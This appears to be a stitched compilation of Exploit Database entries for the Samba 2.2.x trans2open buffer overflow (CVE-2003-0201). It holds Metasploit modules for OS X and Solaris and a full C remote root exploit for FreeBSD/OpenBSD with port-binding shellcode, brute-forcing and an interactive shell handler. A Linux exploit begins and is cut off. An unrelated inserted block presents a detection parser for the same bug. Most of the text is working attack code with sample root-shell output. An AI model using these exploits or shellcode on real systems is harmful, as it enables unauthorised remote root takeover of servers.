[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
},
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Targets' =>
[
[ 'Samba 2.2.x - Bruteforce',
{
# Not necessary on PPC
# 'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
'Offset' => 1195,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbffffdfc },
'Stop' => { 'Ret' => 0xbfa00000 },
'Step' => 512
}
}
]
],
'DisclosureDate' => 'Apr 7 2003',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(139)
], self.class)
end
# Need to perform target detection
def autofilter
false
end
def brute_exploit(addrs)
curr_ret = addrs['Ret']
begin
print_status("Trying return address 0x%.8x..." % curr_ret)
connect
smb_login
# 1988 is required for findrecv shellcode
pattern = rand_text_english(1988)
# This stream covers the framepointer and the return address
off = target['Offset']
pattern[off, 64] = [curr_ret].pack('N') * 16
# Stuff the shellcode into the request
pattern[3, payload.encoded.length] = payload.encoded
trans =
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
pattern
sock.put(trans)
handler
disconnect
rescue EOFError
rescue => e
print_error("#{e}")
end
end
end
Exploit Database EDB-ID: 16330
Publication date: 2010-06-20 22:00 +00:00
Author: Metasploit
EDB Verified: Yes
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SMB
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba trans2open Overflow (Solaris SPARC)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the flaw on Solaris SPARC systems that do not
have the noexec stack option set. Big thanks to MC and
valsmith for resolving a problem with the beta version of
this module.
},
'Author' => [ 'hdm', 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9571 $',
'References' =>
[
[ 'CVE', '2003-0201' ],
[ 'OSVDB', '4469' ],
[ 'BID', '7294' ],
[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
},
'Platform' => 'solaris',
'Targets' =>
[
[ 'Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce',
{
'PtrToNonZero' => 0xffbffffc, # near the bottom of the stack
'Offset' => 1103,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xffbffaf0 },
'Stop' => { 'Ret' => 0xffbfa000 },
'Step' => 128
}
}
],
[ 'Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce',
{
'PtrToNonZero' => 0xffbefffc, # near the bottom of the stack
'Offset' => 1103,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xffbefaf0 },
'Stop' => { 'Ret' => 0xffbea000 },
'Step' => 128
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 7 2003'
))
register_options(
[
Opt::RPORT(139)
], self.class)
end
def brute_exploit(addrs)
curr_ret = addrs['Ret']
begin
print_status("Trying return address 0x%.8x..." % curr_ret)
connect
smb_login
#
# The obstacle course:
# outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize);
# smb_dump(smb_fn_name(type), 0, outbuf, outsize);
# return(outsize);
#
# This value *must* be 1988 to allow findrecv shellcode to work
pattern = rand_text_english(1988)
#
# This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
#
# Patch the overwritten heap pointers
# substr($pattern, 1159, 4, pack('N', $target->[4]));
# substr($pattern, 1163, 4, pack('N', $target->[4]));
#
# >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
# substr($pattern, 1195, 4, pack('N', 0xffffffff));
#
# Fix the frame pointer (need to check for null in address)
# substr($pattern, 1243, 4, pack('N', $target->[3]-64));
#
# Finally set the return address
# substr($pattern, 1247, 4, pack('N', $curr_ret));
#
#
# This method is more reliable against a wider range of targets
#
off = target['Offset']
ptr_to_non_zero = target['PtrToNonZero']
# Local variable pointer patches for early versions of 2.2.x
pattern[off, 36] = [ptr_to_non_zero - 1024].pack('N') * 9
off += 36
# Overwrite heap pointers with a ptr to NULL at the top of the stack
pattern[off, 40] = [ptr_to_non_zero - 1024].pack('N') * 10
off += 40
# Patch the type index into the smb_messages[] array...
# >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
pattern[off, 20] = [0xffffffff].pack('N') * 5
off += 20
# This stream covers the framepointer and the return address
pattern[off, 400] = [curr_ret].pack('N') * 100
# Stuff the shellcode into the request
pattern[3, payload.encoded.length] = payload.encoded
trans =
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
pattern
sock.put(trans)
handler
disconnect
rescue EOFError
rescue => e
print_error("#{e}")
end
end
end
Exploit Database EDB-ID: 22468
Publication date: 2003-04-10 22:00 +00:00
Author: Xpl017Elz
EDB Verified: Yes
// source: https://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
/*
**
** [+] Title: Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
** 11/Apr/2003
** [+] Exploit code: 0x82-Remote.54AAb4.xpl.c
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** source/smbd/trans2.c:
**
** line:205 static int call_trans2open(connection_struct *conn, char *inbuf, char *outbuf, int bufsize,
** line:206 char **pparams, int total_params, char **ppdata, int total_data)
** line:207 {
** [...]
** line:219 char *pname;
** line:220 int16 namelen;
** [...]
** line:222 pstring fname; // source/include/smb.h:
** // line:162 #define PSTRING_LEN 1024
** // line:165 typedef char pstring[PSTRING_LEN];
** [...]
** line:250 namelen = strlen(pname)+1;
** line:251
** line:252 StrnCpy(fname,pname,namelen); // here.
**
** reply_trans2() function:
**
** line:3173 int reply_trans2(connection_struct *conn, char *inbuf,char *outbuf,int length,int bufsize)
** [...]
** line:3358 outsize = call_trans2open(conn, inbuf, outbuf, bufsize,
** line:3359 &params, total_params, &data, total_data);
** line:3360 END_PROFILE_NESTED(Trans2_open);
** line:3361 break;
**
** The point where the program's control flow changes comes after
** the overwritten variables are used.
**
** Detailed information references digitaldefense's Advisory.
**
** http://www.digitaldefense.net/labs/advisories/DDI-1013.txt
**
** Thanks also to eSDee's exploit, which served as a reminder of the Samba application communication method.
** --
** Thank you.
**
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
struct os {
int num;
char *ost;
u_long shell;
};
struct os plat[]=
{
{
0,"FreeBSD 4.6.2-RELEASE #0 i386, Samba v2.2.x",
/*
v2.2.0 exploited successfully. (Brute-Force mode)
v2.2.1a exploited successfully. (Brute-Force mode)
v2.2.2 exploited successfully. (Brute-Force mode)
v2.2.3 exploited successfully. (Default mode)
v2.2.4 exploited successfully. (Default mode)
v2.2.5 exploited successfully. (Default mode)
v2.2.6 exploited successfully. (Default mode)
v2.2.7 exploited successfully. (Default mode)
v2.2.8 exploited successfully. (Default mode)
*/
0xbfbff482
},
{
1,"OpenBSD 3.0 GENERIC#94 i386, Samba v2.2.x",
/*
v2.2.0 exploited successfully. (Brute-Force mode)
v2.2.1a exploited successfully. (Brute-Force mode)
v2.2.2 exploited successfully. (Brute-Force mode)
v2.2.3 exploited successfully. (Default mode)
v2.2.4 exploited successfully. (Default mode)
v2.2.5 exploited successfully. (Default mode)
v2.2.6 exploited successfully. (Default mode)
v2.2.7 exploited successfully. (Default mode)
v2.2.8 exploited successfully. (Default mode)
*/
0xdfbfd482
},
{
2,NULL,0
}
};
char shellcode[]=
/* 86bytes portbinding shellcode by bighawk */
"\x31\xc9" // xor ecx, ecx
"\xf7\xe1" // mul ecx
"\x51" // push ecx
"\x41" // inc ecx
"\x51" // push ecx
"\x41" // inc ecx
"\x51" // push ecx
"\x51" // push ecx
"\xb0\x61" // mov al, 97
"\xcd\x80" // int 80h
"\x89\xc3" // mov ebx, eax
"\x52" // push edx
"\x66\x68\x27\x10" // push word 4135
"\x66\x51" // push cx
"\x89\xe6" // mov esi, esp
"\xb1\x10" // mov cl, 16
"\x51" // push ecx
"\x56" // push esi
"\x50" // push eax
"\x50" // push eax
"\xb0\x68" // mov al, 104
"\xcd\x80" // int 80h
"\x51" // push ecx
"\x53" // push ebx
"\x53" // push ebx
"\xb0\x6a" // mov al, 106
"\xcd\x80" // int 80h
"\x52" // push edx
"\x52" // push edx
"\x53" // push ebx
"\x53" // push ebx
"\xb0\x1e" // mov al, 30
"\xcd\x80" // int 80h
"\xb1\x03" // mov cl, 3
"\x89\xc3" // mov ebx, eax
"\xb0\x5a" // mov al, 90
"\x49" // dec ecx
"\x51" // push ecx
"\x53" // push ebx
"\x53" // push ebx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf5" // loop-10
"\x51" // push ecx
"\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
"\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x54" // push esp
"\x53" // push ebx
"\x53" // push ebx
"\xb0\x3b" // mov al, 59
"\xcd\x80"; // int 80h
#define BRUTE_AT (64)
#define SH_PORT (10000)
#define ATK_PORT (139)
#define DF_NOP (0x41)
#define __BUF_LEN (0x00000463)
#define __LEN_PAD (0x0000012c)
void banrl();
int re_connt(int sock,int type);
void usage(char *p_name);
int setsock(char *host,int port);
void send_recv_sh(int sock);
int __atk_code_send_recv(int sock,u_long shell);
int __atk_code_send_recv(int sock,u_long shell)
{
int eat_buf_set=0,atk_buf_pos=0;
char atk_buf[0x960+5];
char its_exploit_packet[]={
0x00,0x04,0x09,0x60,0xff,0x53,0x4d,0x42,
0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x64,0x00,0x00,0x00,0x00,0xd0,0x07,0x0c,
0x00,0xd0,0x07,0x0c,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,
0x07,0x43,0x00,0x0c,0x00,0x14,0x08,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,
0x00
};
char its_first_time_conn[]={
0x00,0x00,0x00,0x2e,0xff,0x53,0x4d,0x42,
0x73,0x00,0x00,0x00,0x00,0x08,0x01,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x64,0x00,0x01,0x00,0x00,0xff,0x00,0x00,
0x00,0x00,0x20,0x02,0x00,0x01,0x00,0x00,
0x00,0x00
};
char its_second_time_conn[]={
0x00,0x00,0x00,0x3c,0xff,0x53,0x4d,0x42,
0x70,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x0c,0x20,
0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x5c,0x5c,0x69,0x70,0x63,0x24,0x25,0x6e,
0x6f,0x62,0x6f,0x64,0x79,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x49,0x50,0x43,0x24
};
int first_packet_len=sizeof(its_first_time_conn);
int second_packet_len=sizeof(its_second_time_conn);
memset((char *)atk_buf,0,sizeof(atk_buf));
memcpy(atk_buf,its_first_time_conn,sizeof(its_first_time_conn));
send(sock,atk_buf,first_packet_len,0);
recv(sock,atk_buf,sizeof(atk_buf)-1,0);
memset((char *)atk_buf,0,sizeof(atk_buf));
memcpy(atk_buf,its_second_time_conn,sizeof(its_second_time_conn));
send(sock,atk_buf,second_packet_len,0);
recv(sock,atk_buf,sizeof(atk_buf)-1,0);
memset((char *)atk_buf,0,sizeof(atk_buf));
memcpy(atk_buf+atk_buf_pos,its_exploit_packet,sizeof(its_exploit_packet));
atk_buf_pos+=sizeof(its_exploit_packet);
memset(atk_buf+atk_buf_pos,DF_NOP,((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos));
atk_buf_pos+=((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos);
memcpy(atk_buf+atk_buf_pos,shellcode,strlen(shellcode));
atk_buf_pos+=strlen(shellcode);
memset(atk_buf+atk_buf_pos,DF_NOP,__LEN_PAD);
atk_buf_pos+=(__LEN_PAD);
#ifdef __DEBUG
sleep(10);
#endif
{
*(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));// fake fp
atk_buf_pos+=4;
*(long *)&atk_buf[atk_buf_pos]=(shell);// retaddr;
atk_buf_pos+=4;
*(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));// fake fp
atk_buf_pos+=4;
}
send(sock,atk_buf,sizeof(atk_buf)-1,0);
}
int main(int argc,char *argv[])
{
int sock,whtl,type=0,brute_f=0;
char tg_host[0x82]="localhost";
u_long shell=plat[type].shell;
(void)banrl();
if(argc<2)
{
(void)usage(argv[0]);
}
while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1)
{
extern char *optarg;
switch(whtl)
{
case 'H':
case 'h':
memset((char *)tg_host,0,sizeof(tg_host));
strncpy(tg_host,optarg,sizeof(tg_host)-1);
break;
case 'S':
case 's':
shell=strtoul(optarg,0,0);
break;
case 'T':
case 't':
if((type=atoi(optarg))>1)
{
(void)usage(argv[0]);
}
else shell=plat[type].shell;
break;
case 'I':
case 'i':
(void)usage(argv[0]);
break;
case 'B':
case 'b':
brute_f++;
break;
case '?':
fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]);
exit(-1);
break;
}
}
if(brute_f)
{
fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT);
fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n");
fprintf(stdout," [*] Brute-Force mode:\n\n");
fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|");
fprintf(stdout,"\n |");
for(brute_f=0;brute_f<BRUTE_AT;brute_f++)
{
fflush(stdout);
fprintf(stdout,"=");
shell+=(0x100);
sock=(int)setsock(tg_host,ATK_PORT);
if((int)re_connt(sock,0)==-1)
{
while(!(brute_f>=BRUTE_AT-1))
{
fprintf(stdout,"=");
brute_f++;
}
fprintf(stdout,"|\n\n");
fprintf(stderr," [-] Connect Failed.\n\n");
exit(-1);
}
__atk_code_send_recv(sock,shell);
close(sock);
sleep(2);
sock=(int)setsock(tg_host,SH_PORT);
if((int)re_connt(sock,0)==-1)
{
continue;
}
while(!(brute_f>=BRUTE_AT-1))
{
fprintf(stdout,"=");
brute_f++;
}
fprintf(stdout,"|\n\n");
fprintf(stdout," [+] Shellcode address: %p\n",shell);
fprintf(stdout," [*] Brute-Force end !!\n\n");
fprintf(stdout," **\n ** Bind shellcode is port 10000.\n");
fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n");
(void)send_recv_sh(sock);
}
fprintf(stdout,"|\n\n **\n");
fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n");
fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT);
fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n");
fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n");
exit(-1);
}
else
{
fprintf(stdout," [0] Target: %s\n",plat[type].ost);
fprintf(stdout," [1] Set socket.\n");
sock=(int)setsock(tg_host,ATK_PORT);
(int)re_connt(sock,1);
fprintf(stdout," [2] Make shellcode & Send Packet.\n");
__atk_code_send_recv(sock,shell);
close(sock);
fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT);
sleep(2);
sock=(int)setsock(tg_host,SH_PORT);
(int)re_connt(sock,1);
fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT);
(void)send_recv_sh(sock);
}
}
int setsock(char *hostip,int port)
{
int sock;
struct hostent *he;
struct sockaddr_in x82;
if((he=gethostbyname(hostip))==NULL)
{
return(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
return(-1);
}
x82.sin_family=AF_INET;
x82.sin_port=htons(port);
x82.sin_addr=*((struct in_addr *)he->h_addr);
memset(&(x82.sin_zero),0,8);
if(connect(sock,(struct sockaddr *)&x82,sizeof(struct sockaddr))==-1)
{
return(-1);
}
return(sock);
}
int re_connt(int sock,int type)
{
if(sock==-1)
{
if(type)
{
fprintf(stderr," [-] Connect Failed.\n\n");
exit(-1);
}
else return(-1);
}
}
void send_recv_sh(int sock)
{
int pk;
struct timeval tm;
char *t_cmd="su -l\n";
char *n_cmd="uname -a;id;exec sh -i\n";
char rbuf[1024];
fd_set rset;
memset((char *)rbuf,0,sizeof(rbuf));
fprintf(stdout," [*] Executed shell successfully !\n");
fprintf(stdout," [*] Command: # su -l; uname -a; id; exec sh -i\n\n");
send(sock,t_cmd,strlen(t_cmd),0);
send(sock,n_cmd,strlen(n_cmd),0);
tm.tv_sec=10;
tm.tv_usec=0;
while(1)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,&tm);
if(FD_ISSET(sock,&rset))
{
pk=read(sock,rbuf,sizeof(rbuf)-1);
if(pk<=0)
{
fprintf(stdout," [*] Happy-Exploit\n\n");
close(sock);
exit(0);
}
rbuf[pk]=0;
fprintf(stdout,"%s",rbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
pk=read(STDIN_FILENO,rbuf,sizeof(rbuf)-1);
if(pk>0)
{
rbuf[pk]=0;
write(sock,rbuf,pk);
}
}
}
return;
}
void banrl()
{
fprintf(stdout,"\n Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD\n");
fprintf(stdout," by Xpl017Elz.\n\n");
}
void usage(char *p_name)
{
int r_s=0;
fprintf(stdout," Usage: %s -option [argument]\n",p_name);
fprintf(stdout,"\n\t-h - hostname. (default: localhost)\n");
fprintf(stdout,"\t-s - shellcode. (select target)\n");
fprintf(stdout,"\t-t - target number.\n");
fprintf(stdout,"\t-b - auto brute-force attack mode.\n");
fprintf(stdout,"\t-i - help information.\n\n");
fprintf(stdout," Select target number:\n\n");
for(;;)
{
if(plat[r_s].ost==NULL)
break;
else fprintf(stdout,"\t{%d} %s\n",plat[r_s].num,plat[r_s].ost);
r_s++;
}
fprintf(stdout,"\n Example> %s -hlocalhost -s 0x82828282\n\n",p_name);
exit(-1);
}
/*
**
** OpenBSD exploit:
** --
** bash$ ./0x82-Remote.54AAb4.xpl -h 61.37.xxx.xx -t1
**
** Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
** by Xpl017Elz.
**
** [0] Target: OpenBSD 3.0 GENERIC#94 i386, Samba v2.2.x
** [1] Set socket.
** [2] Make shellcode & Send Packet.
** [3] Trying 61.37.xxx.xx:10000.
** [*] Connected to 61.37.xxx.xx:10000.
** [*] Executed shell successfully !
** [*] Command: # su -l; uname -a; id; exec sh -i
**
** tset: standard error: Operation not supported
** OpenBSD testsub 3.0 GENERIC#94 i386
** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
** sh: No controlling tty (open /dev/tty: Device not configured)
** sh: Can't find tty file descriptor
** sh: warning: won't have full job control
** #
** --
**
** FreeBSD exploit:
** --
** bash$ ./0x82-Remote.54AAb4.xpl -h 61.37.xxx.xx -t0
**
** Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
** by Xpl017Elz.
**
** [0] Target: FreeBSD 4.6.2-RELEASE #0 i386, Samba v2.2.x
** [1] Set socket.
** [2] Make shellcode & Send Packet.
** [3] Trying 61.37.xxx.xx:10000.
** [*] Connected to 61.37.xxx.xx:10000.
** [*] Executed shell successfully !
** [*] Command: # su -l; uname -a; id; exec sh -i
**
** Warning: no access to tty (Bad file descriptor).
** Thus no job control in this shell.
** FreeBSD localhost 4.6.2-RELEASE FreeBSD 4.6.2-RELEASE #0: Wed Aug 14 21:23:26 GMT 2002
** murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386
** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
** sh: can't access tty; job control turned off
** #
** --
**
*/
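The header comment of the Xpl017Elz listing above pins the bug down to one line: call_trans2open() does StrnCpy(fname, pname, strlen(pname)+1) into the 1024-byte pstring fname, with pname taken straight from the client's TRANS2_OPEN2 parameter block. The following is an added detection check, not code from any exploit on this page: it parses a NetBIOS-framed SMB_COM_TRANSACTION2 request the way Samba 2.2 did (fixed smb_vwvN offsets, Setup[0] as the subcommand) and flags a filename the pstring cannot hold. The 28-byte fixed prefix before FileName is the TRANS2_OPEN2 parameter layout; the function names and the packet builder (used only to construct test vectors) are this example's own.

```c
/* Added detection example, not code from any exploit on this page: parse a
 * NetBIOS-framed SMB_COM_TRANSACTION2 request and decide whether the
 * TRANS2_OPEN2 filename would overflow Samba 2.2.x's 1024-byte pstring. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PSTRING_LEN 1024            /* source/include/smb.h in Samba 2.2.x */
#define SMB_COM_TRANSACTION2 0x32
#define TRANS2_OPEN2 0x0000
#define NBT_HDR_LEN 4
#define SMB_HDR_LEN 32              /* "\xffSMB" through MID */
#define OPEN2_FIXED_PARAMS 28       /* FileName follows 28 fixed bytes (MS-CIFS TRANS2_OPEN2) */

enum verdict { T2O_MALFORMED = -1, T2O_NOT_TRANS2_OPEN = 0, T2O_SAFE = 1, T2O_OVERFLOW = 2 };

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* Inspect one request. On T2O_SAFE/T2O_OVERFLOW, *name_len receives the length
 * Samba's strlen(pname) would have seen, bounded to the parameter block. */
int trans2open_check(const uint8_t *pkt, size_t len, size_t *name_len)
{
    if (len < NBT_HDR_LEN + SMB_HDR_LEN + 1 + 30) return T2O_MALFORMED;
    const uint8_t *smb = pkt + NBT_HDR_LEN;
    size_t smb_len = len - NBT_HDR_LEN;
    if (memcmp(smb, "\xffSMB", 4) != 0) return T2O_MALFORMED;
    if (smb[4] != SMB_COM_TRANSACTION2) return T2O_NOT_TRANS2_OPEN;

    /* Samba 2.2 reads the transaction words at fixed offsets (smb_vwvN) and
     * ignores WordCount, so the check does the same. */
    const uint8_t *vwv = smb + SMB_HDR_LEN + 1;
    uint16_t pscnt = le16(vwv + 2 * 9);    /* ParameterCount  (smb_pscnt) */
    uint16_t psoff = le16(vwv + 2 * 10);   /* ParameterOffset (smb_psoff), from SMB start */
    if (vwv[2 * 13] < 1) return T2O_MALFORMED;               /* SetupCount */
    if (le16(vwv + 2 * 14) != TRANS2_OPEN2) return T2O_NOT_TRANS2_OPEN;

    /* Never trust psoff/pscnt: bound them by the bytes actually received. */
    if ((size_t)psoff + pscnt > smb_len || pscnt <= OPEN2_FIXED_PARAMS)
        return T2O_MALFORMED;
    const uint8_t *fname = smb + psoff + OPEN2_FIXED_PARAMS;
    size_t avail = pscnt - OPEN2_FIXED_PARAMS, n = 0;
    while (n < avail && fname[n] != 0) n++;              /* bounded strlen() */
    if (name_len) *name_len = n;
    /* StrnCpy(fname, pname, strlen(pname)+1) writes n+1 bytes into the
     * 1024-byte pstring, so any name longer than 1023 bytes overflows it. */
    return n > PSTRING_LEN - 1 ? T2O_OVERFLOW : T2O_SAFE;
}

/* Constructed test vector, not a capture: a minimal TRANS2_OPEN2 request
 * carrying `name`. Returns bytes written, or 0 if `cap` is too small. */
size_t build_trans2open(uint8_t *buf, size_t cap, const char *name)
{
    size_t nlen = strlen(name);
    uint16_t psoff = SMB_HDR_LEN + 1 + 30 + 2;      /* header, WordCount, 15 words, ByteCount */
    size_t pscnt = OPEN2_FIXED_PARAMS + nlen + 1;
    size_t total = NBT_HDR_LEN + psoff + pscnt;
    if (total > cap || pscnt > 0xffff) return 0;
    memset(buf, 0, total);
    size_t smb_len = total - NBT_HDR_LEN;            /* NetBIOS session message length */
    buf[1] = (uint8_t)((smb_len >> 16) & 1); buf[2] = (uint8_t)(smb_len >> 8); buf[3] = (uint8_t)smb_len;
    uint8_t *smb = buf + NBT_HDR_LEN;
    memcpy(smb, "\xffSMB", 4);
    smb[4] = SMB_COM_TRANSACTION2;
    smb[SMB_HDR_LEN] = 15;                           /* WordCount */
    uint8_t *vwv = smb + SMB_HDR_LEN + 1;
    put16(vwv + 2 * 0, (uint16_t)pscnt);             /* TotalParameterCount */
    put16(vwv + 2 * 9, (uint16_t)pscnt);             /* ParameterCount */
    put16(vwv + 2 * 10, psoff);                      /* ParameterOffset */
    vwv[2 * 13] = 1;                                 /* SetupCount */
    put16(vwv + 2 * 14, TRANS2_OPEN2);               /* Setup[0]: subcommand */
    put16(vwv + 2 * 15, (uint16_t)pscnt);            /* ByteCount */
    memcpy(smb + psoff + OPEN2_FIXED_PARAMS, name, nlen + 1);
    return total;
}

/* Build a request whose name is `n` 'A' bytes, optionally drop `drop` trailing
 * bytes to mimic a truncated capture, and return the detector's verdict. */
int check_name_of_length(size_t n, size_t drop, size_t *seen)
{
    static uint8_t pkt[4096];
    static char name[4096];
    if (n >= sizeof name) return T2O_MALFORMED;
    memset(name, 'A', n); name[n] = 0;
    size_t len = build_trans2open(pkt, sizeof pkt, name);
    if (len == 0 || drop > len) return T2O_MALFORMED;
    return trans2open_check(pkt, len - drop, seen);
}

int main(void)
{
    size_t seen = 0;
    int v = check_name_of_length(1988, 0, &seen);   /* 1988 is the size the modules above send */
    printf("15-byte name   -> verdict %d\n", check_name_of_length(15, 0, NULL));
    printf("1988-byte name -> verdict %d, strlen(pname) = %zu\n", v, seen);
    return 0;
}
```

A verdict of T2O_MALFORMED on a live capture usually means the parameter block is spread over secondary transaction messages, which this single-packet check does not reassemble.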
Exploit Database EDB-ID: 22469
Publication date: 2003-04-06 22:00 +00:00
Author: c0wboy
EDB Verified: Yes
/*
source: https://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploitdb/pull/78/files
*/
/* 0x333hate => samba 2.2.x remote root exploit
*
* generic linux x86 samba remote root
* exploit, based on trans2root.pl
*
* coded by c0wboy
*
* ~ www.0x333.org ~
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#define fatal(x...) { fprintf (stderr, ##x); exit(-333); }
#define BUFFER 1500
#define SHELL 5074
#define PORT 139
#define NOP 0x90
#define START 0xbfffffff
#define STOP 0xbf000000
#define OFFSET 512
typedef enum {FALSE,TRUE} BOOLEAN;
unsigned char setup1[] =
"\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00"
"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00"
"\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
